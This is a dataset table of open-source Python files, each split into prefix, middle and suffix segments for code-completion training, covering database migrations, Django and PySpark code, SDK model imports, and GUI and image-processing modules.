repo_name stringlengths 5 100 | path stringlengths 4 231 | language stringclasses 1 value | license stringclasses 15 values | size int64 6 947k | score float64 0 0.34 | prefix stringlengths 0 8.16k | middle stringlengths 3 512 | suffix stringlengths 0 8.17k |
|---|---|---|---|---|---|---|---|---|
Clinical-Genomics/housekeeper | alembic/versions/619fe6fe066c_update_cascading_rules.py | Python | mit | 554 | 0.01083 | """update cascading rules
Revision ID: 619fe6fe066c
Revises: 73ea6c072986
Create Date: 2017-03-15 10:51:12.494508
"""
# revision identifiers, used by Alembic.
revision = "619fe6fe066 | c"
down_revision = "73ea | 6c072986"
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
pass
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
pass
### end Alembic commands ###
|
rwl/PyCIM | CIM14/IEC61970/Meas/LimitSet.py | Python | mit | 2,248 | 0.002669 | # Copyright (C) 2010-2011 Richard Lincoln
#
# Permission is hereby granted, | free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# de | al in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from CIM14.IEC61970.Core.IdentifiedObject import IdentifiedObject
class LimitSet(IdentifiedObject):
"""Specifies a set of Limits that are associated with a Measurement. A Measurement may have several LimitSets corresponding to seasonal or other changing conditions. The condition is captured in the name and description attributes. The same LimitSet may be used for several Measurements. In particular percentage limits are used this way.
"""
def __init__(self, isPercentageLimits=False, *args, **kw_args):
"""Initialises a new 'LimitSet' instance.
@param isPercentageLimits: Tells if the limit values are in percentage of normalValue or the specified Unit for Measurements and Controls.
"""
#: Tells if the limit values are in percentage of normalValue or the specified Unit for Measurements and Controls.
self.isPercentageLimits = isPercentageLimits
super(LimitSet, self).__init__(*args, **kw_args)
_attrs = ["isPercentageLimits"]
_attr_types = {"isPercentageLimits": bool}
_defaults = {"isPercentageLimits": False}
_enums = {}
_refs = []
_many_refs = []
|
umitproject/network-admin | netadmin/reportmeta/urls.py | Python | agpl-3.0 | 1,723 | 0.004643 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) 2011 Adriano Monteiro Marques
#
# Author: Piotrek Wasilewski <wasilewski.piotrek@gmail.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.conf.urls.defaults import *
from django.views.generic.create_update import delete_object
from netadmin.reportmeta.models import ReportMeta
urlpatterns = patterns('netadmin.reportmeta.views',
url(r'^$', 'reports', name='reports'),
url(r'^(?P<object_id>\d+)/$', 'reportmeta_detail', name='reportmeta_detail'),
url(r'^get/(?P<object_id>\d+)/$', 'reportmeta_get_report', name='reportmeta_g | et_report'),
url(r'^list/(?P<object_type>host|network)/$', 'reportmeta_list', name='reportmeta_list'),
url(r'^new/(?P<object_type>host|network)/$', 'reportmeta_new', name="reportmeta_new"),
url(r'^new/(?P<object_type>host|network)/(?P<object_id>\d+)/$', 'reportmeta_new_from_object', name="reportmeta_new"),
url(r'^edit/(?P<object_id>\d+)/$', 'reportmeta_update', na | me="reportmeta_update"),
url(r'^delete/(?P<object_id>\d+)/$', 'reportmeta_delete', name="reportmeta_delete"),
)
|
Azure/azure-sdk-for-python | sdk/azurestack/azure-mgmt-azurestack/azure/mgmt/azurestack/models/__init__.py | Python | mit | 5,480 | 0.000547 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
try:
from ._models_py3 import ActivationKeyResult
from ._models_py3 import CloudManifestFileDeploymentData
from ._models_py3 import CloudManifestFileProperties
from ._models_py3 import CloudManifestFileResponse
from ._models_py3 import Compatibility
from ._models_py3 import CustomerSubscription
from ._models_py3 import CustomerSubscriptionList
from ._models_py3 import DataDiskImage
from ._models_py3 import DeviceConfiguration
from ._models_py3 import Display
from ._models_py3 import ErrorDetails
from ._models_py3 import ErrorResponse
from ._models_py3 import ExtendedProduct
from ._models_py3 import ExtendedProductProperties
from ._models_py3 import IconUris
from ._models_py3 import LinkedSubscription
from ._models_py3 import LinkedSubscriptionParameter
from ._models_py3 import LinkedSubscriptionsList
from ._models_py3 import MarketplaceProductLogUpdate
from ._models_py3 import Operation
from ._models_py3 import OperationList
fr | om ._models_py3 import OsDiskImage
from ._models_py3 import Product
from ._models_py3 import ProductLink
from ._models_py3 import ProductList
from ._models_py3 import ProductLog
from ._models_py3 import ProductProperties
from ._models_py3 import Registration
from ._models_py3 import RegistrationList
from ._models_py3 import RegistrationParameter
from ._models_py3 import Resource
from ._models_py3 import SystemData
from ._models_py3 import T | rackedResource
from ._models_py3 import VirtualMachineExtensionProductProperties
from ._models_py3 import VirtualMachineProductProperties
except (SyntaxError, ImportError):
from ._models import ActivationKeyResult # type: ignore
from ._models import CloudManifestFileDeploymentData # type: ignore
from ._models import CloudManifestFileProperties # type: ignore
from ._models import CloudManifestFileResponse # type: ignore
from ._models import Compatibility # type: ignore
from ._models import CustomerSubscription # type: ignore
from ._models import CustomerSubscriptionList # type: ignore
from ._models import DataDiskImage # type: ignore
from ._models import DeviceConfiguration # type: ignore
from ._models import Display # type: ignore
from ._models import ErrorDetails # type: ignore
from ._models import ErrorResponse # type: ignore
from ._models import ExtendedProduct # type: ignore
from ._models import ExtendedProductProperties # type: ignore
from ._models import IconUris # type: ignore
from ._models import LinkedSubscription # type: ignore
from ._models import LinkedSubscriptionParameter # type: ignore
from ._models import LinkedSubscriptionsList # type: ignore
from ._models import MarketplaceProductLogUpdate # type: ignore
from ._models import Operation # type: ignore
from ._models import OperationList # type: ignore
from ._models import OsDiskImage # type: ignore
from ._models import Product # type: ignore
from ._models import ProductLink # type: ignore
from ._models import ProductList # type: ignore
from ._models import ProductLog # type: ignore
from ._models import ProductProperties # type: ignore
from ._models import Registration # type: ignore
from ._models import RegistrationList # type: ignore
from ._models import RegistrationParameter # type: ignore
from ._models import Resource # type: ignore
from ._models import SystemData # type: ignore
from ._models import TrackedResource # type: ignore
from ._models import VirtualMachineExtensionProductProperties # type: ignore
from ._models import VirtualMachineProductProperties # type: ignore
from ._azure_stack_management_client_enums import (
Category,
CompatibilityIssue,
ComputeRole,
CreatedByType,
Location,
OperatingSystem,
ProvisioningState,
)
__all__ = [
'ActivationKeyResult',
'CloudManifestFileDeploymentData',
'CloudManifestFileProperties',
'CloudManifestFileResponse',
'Compatibility',
'CustomerSubscription',
'CustomerSubscriptionList',
'DataDiskImage',
'DeviceConfiguration',
'Display',
'ErrorDetails',
'ErrorResponse',
'ExtendedProduct',
'ExtendedProductProperties',
'IconUris',
'LinkedSubscription',
'LinkedSubscriptionParameter',
'LinkedSubscriptionsList',
'MarketplaceProductLogUpdate',
'Operation',
'OperationList',
'OsDiskImage',
'Product',
'ProductLink',
'ProductList',
'ProductLog',
'ProductProperties',
'Registration',
'RegistrationList',
'RegistrationParameter',
'Resource',
'SystemData',
'TrackedResource',
'VirtualMachineExtensionProductProperties',
'VirtualMachineProductProperties',
'Category',
'CompatibilityIssue',
'ComputeRole',
'CreatedByType',
'Location',
'OperatingSystem',
'ProvisioningState',
]
|
sangwook236/general-development-and-testing | sw_dev/python/ext/test/high_performance_computing/spark/pyspark_database.py | Python | gpl-2.0 | 5,564 | 0.028936 | #!/usr/bin/env python
from pyspark.sql import SparkSession
import pyspark.sql.types as types
import pyspark.sql.functions as func
import traceback, sys
# REF [site] >> https://spark.apache.org/docs/latest/sql-programming-guide.html#jdbc-to-other-databases
def sqlite_jdbc():
spark = SparkSession.builder.appName('sqlite-jdbc') \
.config('spark.jars.packages', 'org.xerial:sqlite-jdbc:3.23.1') \
.getOrCreate()
#spark = SparkSession.buil | der.appName('sqlite-jdbc') \
# .config('spark.jars', 'sqlite-jdbc-3.23.1.jar') \
# .getOrCreate()
spark.sparkContext.setLogLevel('WARN')
# REF [site] >> https://spark.apache.org/docs/latest/sql-programming-guide.html#pyspark-usage-guide-for-pandas-with-apache-arrow
# Enable Arrow-based columnar data transfers.
spark.conf.set('spark.sql.execution.arrow.enabled', 'true')
if False:
#db_url = 'jdbc:sqlite:/path/to/dbfile' # File DB.
df = spark.read \
.format('jdbc') \
.option( | 'url', 'jdbc:sqlite:iris.db') \
.option('driver', 'org.sqlite.JDBC') \
.option('dbtable', 'iris') \
.load()
elif False:
# REF [site] >> https://www.sqlite.org/inmemorydb.html
#db_url = 'jdbc:sqlite::memory:' # In-memory DB.
db_url = 'jdbc:sqlite::memory:?cache=shared' # Shared in-memory DB.
#db_url = 'jdbc:sqlite:dbname?mode=memory&cache=shared' # Named, shared in-memory DB.
# NOTE [error] >> Requirement failed: Option 'dbtable' is required.
# NOTE [error] >> SQL error or missing database (no such table: test123).
df = spark.read \
.format('jdbc') \
.option('url', db_url) \
.option('driver', 'org.sqlite.JDBC') \
.option('dbtable', 'test123') \
.load()
else:
rdd = spark.sparkContext.parallelize([
(123, 'Katie', 19, 'brown'),
(234, 'Michael', 22, 'green'),
(345, 'Simone', 23, 'blue')
])
# Specify schema.
schema = types.StructType([
types.StructField('id', types.LongType(), True),
types.StructField('name', types.StringType(), True),
types.StructField('age', types.LongType(), True),
types.StructField('eyeColor', types.StringType(), True)
])
df = spark.createDataFrame(rdd, schema)
df.show()
# NOTE [info] >> It seems that only file DB of SQLite can be used in Spark.
db_url = 'jdbc:sqlite:test.sqlite' # File DB.
# Isolation level: NONE, READ_COMMITTED, READ_UNCOMMITTED, REPEATABLE_READ, SERIALIZABLE.
# REF [site] >> https://stackoverflow.com/questions/16162357/transaction-isolation-levels-relation-with-locks-on-table
df.write \
.format('jdbc') \
.mode('overwrite') \
.option('url', db_url) \
.option('driver', 'org.sqlite.JDBC') \
.option('dbtable', 'swimmers') \
.option('isolationLevel', 'NONE') \
.save()
#df.write.jdbc(url=db_url, table='test', mode='overwrite', properties={'driver': 'org.sqlite.JDBC'})
df1 = df.withColumn('gender', func.lit(0))
df2 = spark.createDataFrame(
[(13, 'Lucy', 12, 'brown'), (37, 'Brian', 47, 'black')],
('id', 'name', 'age', 'eyeColor')
)
df2.write \
.format('jdbc') \
.mode('append') \
.option('url', db_url) \
.option('driver', 'org.sqlite.JDBC') \
.option('dbtable', 'swimmers') \
.option('isolationLevel', 'NONE') \
.save()
def mysql_jdbc():
spark = SparkSession.builder.appName('mysql-jdbc') \
.config('spark.jars.packages', 'mysql:mysql-connector-java:8.0.12') \
.getOrCreate()
#spark = SparkSession.builder.appName('mysql-jdbc') \
# .config('spark.jars', 'mysql-connector-java-8.0.12-bin.jar') \
# .getOrCreate()
spark.sparkContext.setLogLevel('WARN')
# REF [site] >> https://spark.apache.org/docs/latest/sql-programming-guide.html#pyspark-usage-guide-for-pandas-with-apache-arrow
# Enable Arrow-based columnar data transfers.
spark.conf.set('spark.sql.execution.arrow.enabled', 'true')
df = spark.read \
.format('jdbc') \
.option('url', 'jdbc:mysql://host:3306/dbname?characterEncoding=UTF-8&serverTimezone=UTC') \
.option('driver', 'com.mysql.cj.jdbc.Driver') \
.option('dbtable', 'tablename') \
.option('user', 'username') \
.option('password', 'password') \
.load()
df.show()
def sql_basic():
spark = SparkSession.builder.appName('dataframe-operation').getOrCreate()
spark.sparkContext.setLogLevel('WARN')
df = spark.createDataFrame(
[(123, 'Katie', 19, 'brown'), (234, 'Michael', 22, 'green'), (345, 'Simone', 23, 'blue')],
('id', 'name', 'age', 'eyeColor')
)
#df.printSchema()
#df.cache()
df.createOrReplaceTempView('swimmers') # DataFrame -> SQL.
#df1 = spark.sql('select * from swimmers') # SQL -> DataFrame.
spark.sql('select * from swimmers where age >= 20').show()
#spark.catalog.dropTempView('swimmers')
def main():
#sqlite_jdbc()
#mysql_jdbc()
sql_basic()
#%%------------------------------------------------------------------
# Usage:
# python pyspark_database.py
# spark-submit --packages mysql:mysql-connector-java:8.0.12,org.xerial:sqlite-jdbc:3.23.1 pyspark_database.py
# spark-submit --master local[4] --packages mysql:mysql-connector-java:8.0.12,org.xerial:sqlite-jdbc:3.23.1 pyspark_database.py
# spark-submit --master spark://host:7077 --packages mysql:mysql-connector-java:8.0.12,org.xerial:sqlite-jdbc:3.23.1 --executor-memory 10g pyspark_database.py
if '__main__' == __name__:
try:
main()
except:
#ex = sys.exc_info() # (type, exception object, traceback).
##print('{} raised: {}.'.format(ex[0], ex[1]))
#print('{} raised: {}.'.format(ex[0].__name__, ex[1]))
#traceback.print_tb(ex[2], limit=None, file=sys.stdout)
#traceback.print_exception(*sys.exc_info(), limit=None, file=sys.stdout)
traceback.print_exc(limit=None, file=sys.stdout)
|
interlegis/saap | config/rest_framework/templatetags/rest_framework.py | Python | gpl-3.0 | 13,251 | 0.001207 | from __future__ import absolute_import, unicode_literals
import re
from collections import OrderedDict
from django import template
from django.template import loader
#from django.urls import NoReverseMatch, reverse
from django.core.urlresolvers import reverse
from django.utils import six
from django.utils.encoding import force_text, iri_to_uri
from django.utils.html import escape, format_html, smart_urlquote
from django.utils.safestring import SafeData, mark_safe
from rest_framework.compat import apply_markdown, pygments_highlight
from rest_framework.renderers import HTMLFormRenderer
from rest_framework.utils.urls import replace_query_param
register = template.Library()
# Regex for adding classes to html snippets
class_re = re.compile(r'(?<=class=["\'])(.*)(?=["\'])')
@register.tag(name='code')
def highlight_code(parser, token):
code = token.split_contents()[-1]
nodelist = parser.parse(('endcode',))
parser.delete_first_token()
return CodeNode(code, nodelist)
class CodeNode(template.Node):
style = 'emacs'
def __init__(self, lang, code):
self.lang = lang
self.nodelist = code
def render(self, context):
text = self.nodelist.render(context)
return pygments_highlight(text, self.lang, self.style)
@register.filter()
def with_location(fields, location):
return [
field for field in fields
if field.location == location
]
@register.simple_tag
def form_for_link(link):
import coreschema
properties = OrderedDict([
(field.name, field.schema or coreschema.String())
for field in link.fields
])
required = [
field.name
for field in link.fields
if field.required
]
schema = coreschema.Object(properties=properties, required=required)
return mark_safe(coreschema.render_to_form(schema))
@register.simple_tag
def render_markdown(markdown_text):
if apply_markdown is None:
return markdown_text
return mark_safe(apply_markdown(markdown_text))
@register.simple_tag
def get_pagination_html(pager):
return pager.to_html()
@register.simple_tag
def render_form(serializer, template_pack=None):
style = {'template_pack': template_pack} if template_pack else {}
renderer = HTMLFormRenderer()
return renderer.render(serializer.data, None, {'style': style})
@register.simple_tag
def render_field(field, style):
renderer = style.get('renderer', HTMLFormRenderer())
return renderer.render_field(field, style)
@register.simple_tag
def optional_login(request):
"""
Include a login snippet if REST framework's login view is in the URLconf.
"""
try:
login_url = reverse('rest_framework:login')
except NoReverseMatch:
return ''
snippet = "<li><a href='{href}?next={next}'>Log in</a></li>"
snippet = format_html(snippet, href=login_url, next=escape(request.path))
return mark_safe(snippet)
@register.simple_tag
def optional_docs_login(request):
"""
Include a login snippet if REST framework's login view is in the URLconf.
"""
try:
login_url = reverse('rest_framework:login')
except NoReverseMatch:
return 'log in'
snippet = "<a href='{href}?next={next}'>log in</a>"
snippet = format_html(snippet, href=login_url, next=escape(request.path))
return mark_safe(snippet)
@register.simple_tag
def optional_logout(request, user):
"""
Include a logout snippet if REST framework's logout view is in the URLconf.
"""
try:
logout_url = reverse('rest_framework:logout')
except NoReverseMatch:
snippet = format_html('<li class="navbar-text">{user}</li>', user=escape(user))
return mark_safe(snippet)
snippet = """<li class="dropdown">
<a href="#" class="dropdown-toggle" data-toggle="dropdown">
{user}
<b class="caret"></b>
</a>
<ul class="dropdown-menu">
<li><a href='{href}?next={next}'>Log out</a></li>
</ul>
</li>"""
snippet = format_html(snippet, user=escape(user), href=logout_url, next=escape(request.path))
return mark_safe(snippet)
@register.simple_tag
def add_query_param(request, key, val):
"""
Add a query parameter to the current request url, and return the new url.
"""
iri = request.get_full_path()
uri = iri_to_uri(iri)
return escape(replace_query_param(uri, key, val))
@register.filter
def as_string(value):
if value is None:
return ''
return '%s' % value
@register.filter
def as_list_of_strings(value):
return [
'' if (item is None) else ('%s' % item)
for item in value
]
@register.filter
def add_class(value, css_class):
"""
https://stackoverflow.com/questions/4124220/django-adding-css-classes-when-rendering-form-fields-in-a-template
Inserts classes into template variables that contain HTML tags,
useful for modifying forms without needing to change the Form objects.
Usage:
{{ field.label_tag|add_class:"control-label" }}
In the case of REST Framework, the filter is used to add Bootstrap-specific
classes to the forms.
"""
html = six.text_type(value)
match = class_re.search(html)
if match:
m = re.search(r'^%s$|^%s\s|\s%s\s|\s%s$' % (css_class, css_class,
css_class, css_class),
match.group(1))
if not m:
return mark_safe(class_re.sub(match.group(1) + " " + css_class,
html))
else:
return mark_safe(html.replace('>', ' class="%s">' % css_class, 1))
return value
@register.filter
def format_value(value):
if getattr(value, 'is_hyperlink', False):
name = six.text_type(value.obj)
return mark_safe('<a href=%s>%s</a>' % (value, escape(name)))
if value is None or isinstance(value, bool):
return mar | k_safe('<code>%s</code>' % {True: 'true', False: 'false', None: 'null'}[value])
elif isinstance(value, list):
if any([isinstance(item, (list, dict)) for item in value]):
template = loader.get_template('rest_framework/admin/list_value.html')
else:
template = loader.get_template('rest_framework/admin/simple_list_value.html')
context = {'value': value}
return template.render(context)
elif isinstance(value, dict) | :
template = loader.get_template('rest_framework/admin/dict_value.html')
context = {'value': value}
return template.render(context)
elif isinstance(value, six.string_types):
if (
(value.startswith('http:') or value.startswith('https:')) and not
re.search(r'\s', value)
):
return mark_safe('<a href="{value}">{value}</a>'.format(value=escape(value)))
elif '@' in value and not re.search(r'\s', value):
return mark_safe('<a href="mailto:{value}">{value}</a>'.format(value=escape(value)))
elif '\n' in value:
return mark_safe('<pre>%s</pre>' % escape(value))
return six.text_type(value)
@register.filter
def items(value):
"""
Simple filter to return the items of the dict. Useful when the dict may
have a key 'items' which is resolved first in Django tempalte dot-notation
lookup. See issue #4931
Also see: https://stackoverflow.com/questions/15416662/django-template-loop-over-dictionary-items-with-items-as-key
"""
return value.items()
@register.filter
def data(value):
"""
Simple filter to access `data` attribute of object,
specifically coreapi.Document.
As per `items` filter above, allows accessing `document.data` when
Document contains Link keyed-at "data".
See issue #5395
"""
return value.data
@register.filter
def schema_links(section, sec_key=None):
"""
Recursively find every link in a schema, even nested.
"""
NESTED_FORMAT = '%s > %s' # this format is used in docs/js/api.js:normalizeKeys
links = section.links
if section.data:
data = section.data.items()
for sub_section_key, sub_section in d |
timvaillancourt/mongodb_consistent_backup | mongodb_consistent_backup/Upload/__init__.py | Python | apache-2.0 | 1,026 | 0.008772 | from Upload import Upload # NOQA
def config(parser):
parser.add_argument("--upload.method", dest="upload.method", default='none', choices=['gs', 'rsync', 's3', 'none'],
help="Uploader method (default: none)")
parser.add_argument("--upload.remove_uploaded", dest="upload.remove_uploaded", default=False, action="store_true",
help="Remove source files after successful upload ( | default: false)")
parser.add_argument("--upload.retries", dest="upload.retries", default=5, type=int,
help="Number of times to retry upload attempts (default: 5)")
parser.add_argument("--upload.threads", dest="upload.threads", default=4, type=int,
help="Number of threads to use for upload (default: 4)")
parser.add_argument("--upload.file_regex", dest="upload.file_regex", default='none', type=str,
| help="Limit uploaded file names to those matching a regular expression. (default: none)")
return parser
|
BogusCurry/picup-it | picupwebapp/picupwebapp/picture/tools.py | Python | bsd-3-clause | 3,826 | 0.007318 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Image processing tools.
"""
from unidecode import unidecode
from django.conf import settings
import StringIO
try:
from PIL import Image, ImageOps, ImageFilter
except ImportError:
import Image
import ImageOps
import os.path
import shutil
from PIL import Image
from PIL.ExifTags import TAGS
import pyexiv2
THUMB_SIZE = settings.PICUP_THUMB_SIZE
MEDIUM_SIZE = settings.PICUP_MEDIUM_SIZE
def rotate_picture(picture):
"""Detect if picture should be rotated.
Parameters
----------
picture : Picture
"""
tags = {}
i = Image.open(picture.picture.file)
try:
info = i._getexif()
for tag, value in info.items():
decoded = TAGS.get(tag,tag)
tags[decoded] = value
orientation = tags['Orientation']
except:
orientation = 1
if not orientation==1:
orig_filename = picture.picture.file.name+'.orig'
file_ext = picture.picture.file.name.split('.')[-1]
new_filename = picture.picture.file.name+'_fix.'+file_ext
if not os.path.exists(orig_filename):
shutil.copyfile(picture.picture.file.name, orig_filename)
exif_orig = pyexiv2.ImageMetadata(picture.picture.file.name)
exif_orig.read()
i = Image.open(orig_filename)
if orientation == 3:
i = i.transpose(Image.ROTATE_180)
elif orientation == 6:
i = i.transpose(Image.ROTATE_270)
elif orientation == 8:
i = i.transpose(Image.ROTATE_90)
i.save(picture.picture.file.name)
exif_new = pyexiv2.ImageMetadata(picture.picture.file.name)
exif_new.read()
exif_orig.copy(exif_new)
exif_new['Exif.Image.Orientation'] = 1
exif_new.write()
picture.update_thumb()
def process_image(image, size_x, size_y):
"""Process an image.
Parameters
----------
image: models.ImageField
size_x : int
width of the image
size_y : int
height of the image
"""
image.seek(0)
imagefile = StringIO.StringIO(image.read())
imageImage = Image.open(imagefile)
if imageImage.mode != "RGB":
imageImage = imageImage.convert("RGB")
size = imageImage.size
resizedImage = ImageOps.fit(imageImage, (size_x, size_y), Image.ANTIALIAS)
if size[0] < size_x or size[1] < size_y:
if size[0] < size_x:
posX = (size_x-size[0])/2
else:
posX = 0
if size[1] < size_y:
posY = (size_y-size[1])/2
else:
| posY = 0
| resizedImage = resizedImage.filter(ImageFilter.SMOOTH)
resizedImage = resizedImage.filter(ImageFilter.SMOOTH_MORE)
resizedImage = resizedImage.filter(ImageFilter.BLUR)
imagefile = StringIO.StringIO()
resizedImage.save(imagefile,'JPEG')
imagefile.seek(0)
return imagefile
def image_smart(image, x, y):
"""Process an image.
Parameters
----------
image : models.ImageField
x : int
width of the image
y : int
height of the image
"""
return process_image(image, x, y)
def image_medium(image):
"""Process an image with MEDIUM_SIZE as size.
Parameters
----------
image : models.ImageField
"""
return process_image(image, MEDIUM_SIZE[0], MEDIUM_SIZE[1])
def image_thumb(image):
"""Process an image with THUMB_SIZE as size.
Parameters
----------
image : models.ImageField
"""
return process_image(image, THUMB_SIZE[0], THUMB_SIZE[1])
def get_metadata(filename):
"""Get metadata from the image file.
Parameters
----------
filename : str
"""
metadata = pyexiv2.ImageMetadata(filename)
metadata.read()
return metadata
|
bks/veusz | veusz/windows/mainwindow.py | Python | gpl-2.0 | 53,469 | 0.001234 | # -*- coding: utf-8 -*-
# Copyright (C) 2003 Jeremy S. Sanders
# Email: Jeremy Sanders <jeremy@jeremysanders.net>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
##############################################################################
"""Implements the main window of the application."""
from __future__ import division, print_function
import os
import os.path
import sys
import glob
import re
import datetime
try:
import h5py
except ImportError:
h5py = None
from ..compat import cstr, cstrerror, cgetcwd, cbytes
from .. import qtall as qt4
from .. import document
from .. import utils
from ..utils import vzdbus
from .. import setting
from .. import plugins
from . import consolewindow
from . import plotwindow
from . import treeeditwindow
from .datanavigator import DataNavigatorWindow
def _(text, disambiguation=None, context='MainWindow'):
"""Translate text."""
return qt4.QCoreApplication.translate(context, text, disambiguation)
# shortcut to this
setdb = setting.settingdb
class DBusWinInterface(vzdbus.Object):
"""Simple DBus interface to window for triggering actions."""
interface = 'org.veusz.actions'
def __init__(self, actions, index):
prefix = '/Windows/%i/Actions' % index
# possible exception in dbus means we have to check sessionbus
if vzdbus.sessionbus is not None:
vzdbus.Object.__init__(self, vzdbus.sessionbus, prefix)
self.actions = actions
@vzdbus.method(dbus_interface=interface, out_signature='as')
def GetActions(self):
"""Get list of actions which can be activated."""
return sorted(self.actions)
@vzdbus.method(dbus_interface=interface, in_signature='s')
def TriggerAction(self, action):
"""Activate action given."""
self.actions[action].trigger()
class MainWindow(qt4.QMainWindow):
""" The main window class for the application."""
# this is emitted when a dialog is opened by the main window
dialogShown = qt4.pyqtSignal(qt4.QWidget)
# emitted when a document is opened
documentOpened = qt4.pyqtSignal()
windows = []
@classmethod
def CreateWindow(cls, filename=None, mode='graph'):
"""Window factory function.
If filename is given then that file is loaded into the window.
Returns window created
"""
# create the window, and optionally load a saved file
win = cls()
win.show()
if filename:
# load document
win.openFileInWindow(filename)
else:
win.setupDefaultDoc(mode)
# try to select first graph of first page
win.treeedit.doInitialWidgetSelect()
cls.windows.append(win)
# check if tutorial wanted (only for graph mode)
if not setting.settingdb['ask_tutorial'] and mode=='graph':
win.askTutorial()
# don't ask again
setting.settingdb['ask_tutorial'] = True
# check if version check is ok
win.askVersionCheck()
# periodically do the check
win.doVersionCheck()
# is it ok to do feedback?
win.askFeedbackCheck()
# periodically send feedback
win.doFeedback()
return win
def __init__(self, *args):
qt4.QMainWindow.__init__(self, *args)
self.setAcceptDrops(True)
# icon and different size variations
self.setWindowIcon( utils.getIcon('veusz') )
# master documenent
self.document = document.Document()
# filename for document and update titlebar
self.filename = ''
self.updateTitlebar()
# keep a list of references to dialogs
self.dialogs = []
# construct menus and toolbars
self._defineMenus()
# make plot window
self.plot = plotwindow.PlotWindow(self.document, self,
menu = self.menus['view'])
self.setCentralWidget(self.plot)
self.plot.showToolbar()
# likewise with the tree-editing window
self.treeedit = treeeditwindow.TreeEditDock(self.document, self)
self.addDockWidget(qt4.Qt.LeftDockWidgetArea, self.treeedit)
self.propdock = treeeditwindow.PropertiesDock(self.document,
self.treeedit, self)
self.addDockWidget(qt4.Qt.LeftDockWidgetArea, self.propdock)
self.formatdock = treeeditwindow.FormatDock(self.document,
self.treeedit, self)
self.addDockWidget(qt4.Qt.LeftDockWidgetArea, self.formatdock)
self.datadock = DataNavigatorWindow(self.document, self, self)
self.addDockWidget(qt4.Qt.RightDockWidgetArea, self.datado | ck)
# make the console window a dock
self.console = consolewindow.ConsoleWindow(self.document,
self)
self.console.hide()
self.interpreter = self.console.interpreter
self.addDockWidget(qt4.Qt.BottomDockWidgetArea, self.console)
# assemble the statusbar
statusbar = self.statusbar = qt4.QStatusBar(self)
self.setStatusBar(statusbar)
self.updateStatusbar(_('Ready'))
# | a label for the picker readout
self.pickerlabel = qt4.QLabel(statusbar)
self._setPickerFont(self.pickerlabel)
statusbar.addPermanentWidget(self.pickerlabel)
self.pickerlabel.hide()
# plot queue - how many plots are currently being drawn
self.plotqueuecount = 0
self.plot.sigQueueChange.connect(self.plotQueueChanged)
self.plotqueuelabel = qt4.QLabel()
self.plotqueuelabel.setToolTip(_("Number of rendering jobs remaining"))
statusbar.addWidget(self.plotqueuelabel)
self.plotqueuelabel.show()
# a label for the cursor position readout
self.axisvalueslabel = qt4.QLabel(statusbar)
statusbar.addPermanentWidget(self.axisvalueslabel)
self.axisvalueslabel.show()
self.slotUpdateAxisValues(None)
# a label for the page number readout
self.pagelabel = qt4.QLabel(statusbar)
statusbar.addPermanentWidget(self.pagelabel)
self.pagelabel.show()
# working directory - use previous one
self.dirname = setdb.get('dirname', qt4.QDir.homePath())
if setdb['dirname_usecwd']:
self.dirname = cgetcwd()
# connect plot signals to main window
self.plot.sigUpdatePage.connect(self.slotUpdatePage)
self.plot.sigAxisValuesFromMouse.connect(self.slotUpdateAxisValues)
self.plot.sigPickerEnabled.connect(self.slotPickerEnabled)
self.plot.sigPointPicked.connect(self.slotUpdatePickerLabel)
# disable save if already saved
self.document.signalModified.connect(self.slotModifiedDoc)
# if the treeeditwindow changes the page, change the plot window
self.treeedit.sigPageChanged.connect(self.plot.setPageNumber)
# if a widget in the plot window is clicked by the user
self.plot.sigWidgetClicked.connect(self.treeedit.selectWidget)
self.treeedit.widgetsSelected.connect(self.plot.selectedWidgets)
# enable/disable undo/redo
self.menus['edit'].aboutToShow.connect(self.slotAboutToShowEdit)
#Get the list of recently opened files
self.populateRecentFiles()
self.setupWindowGeometry()
self.defineViewWindowMenu()
|
ilogue/niprov | niprov/exceptions.py | Python | bsd-3-clause | 89 | 0 |
class NiprovError(Exception):
| pass
class UnknownFileError(NiprovErr | or):
pass
|
CityPulse/CP_Resourcemanagement | wrapper_dev/romania_weather/romaniaweather_aw.py | Python | mit | 9,102 | 0.003406 | # coding=utf-8
__author__ = 'Marten Fischer (m.fischer@hs-osnabrueck.de)'
